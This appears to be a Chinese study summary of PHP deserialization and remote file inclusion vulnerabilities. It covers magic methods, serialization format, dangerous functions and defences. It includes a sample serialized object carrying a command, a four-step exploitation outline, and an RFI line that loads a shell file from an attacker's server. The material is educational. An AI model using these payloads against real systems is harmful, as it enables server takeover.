PHP反序列化安全核心重点总结
一、PHP面向对象核心(漏洞基础)
类与对象
类:用
class定义,是属性+方法的抽象模板;对象:new实例化后的实体。属性:类的成员变量,用
public/protected/private修饰,类内用$this->属性名调用。方法:类的成员函数,分普通方法(手动调用)和魔术方法(自动触发)。
魔术方法关键
命名:以
__双下划线开头,PHP内置,无需手动调用。漏洞核心触发点:
__wakeup():反序列化时自动触发(最常用)。__destruct():对象销毁时自动触发(隐蔽性极高)。__construct():实例化时触发,反序列化不触发。
二、序列化与反序列化(核心机制)
定义
序列化:
serialize($对象)→ 对象转字符串,用于传输/存储。反序列化:
unserialize($字符串)→ 字符串还原为对象。
安全本质
序列化/反序列化本身无风险,风险源于无校验反序列化+魔术方法+危险函数。
序列化格式示例:
O:4:"Show":1:{s:3:"cmd";s:4:"calc";}O=对象;4=类名长度;Show=类名;1=属性数;s=字符串类型;数字=长度。
三、PHP反序列化漏洞(核心考点)
漏洞定义攻击者控制反序列化输入,触发魔术方法,执行高危函数,导致远程代码执行(RCE)。
触发三要素(缺一不可)
反序列化参数完全可控、无任何校验。
目标类存在可自动触发的魔术方法。
魔术方法内调用可控参数的高危危险函数。
利用四步流程
复刻目标危险类 → 2. 赋值恶意命令 → 3. 序列化生成Payload → 4. 抓包替换触发。
四、高危危险函数(漏洞突破口)
系统命令执行:
system(直接输出)、exec(隐蔽执行)。PHP代码执行:
eval(一句话木马核心)、assert。文件包含:
include、require(可导致远程文件包含漏洞)。
五、远程文件包含漏洞(RFI)
原理:
include/require参数可控,无校验,直接包含远程恶意文件。利用:
?file=http://攻击者服务器/shell.txt。危害:直接RCE,服务器被控。
六、漏洞防御方案(必记)
禁用高危函数:修改
php.ini,disable_functions禁用eval、system、exec等。反序列化白名单:仅允许合法类反序列化,拒绝未知类。
严格校验输入:过滤恶意关键字、限制长度、校验数据类型。
关闭远程包含:
php.ini设置allow_url_include = Off。
七、核心安全结论
反序列化漏洞公式:无校验反序列化 + 自动魔术方法 + 可控危险函数 = 漏洞。
Web安全黄金法则:永远不信任用户输入。
漏洞根源:开发者安全疏忽,而非技术本身问题。